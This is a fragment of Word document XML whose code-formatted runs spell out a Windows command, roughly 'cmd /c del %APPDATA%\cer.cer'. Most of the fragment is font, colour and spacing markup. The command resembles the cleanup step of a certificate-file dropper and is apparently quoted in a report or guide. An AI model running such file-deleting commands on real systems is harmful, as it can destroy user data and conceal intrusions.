          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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rt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b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cmd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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c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404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APPDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\cer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cer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29" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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sectPr>
      <w:type w:val="continuous"/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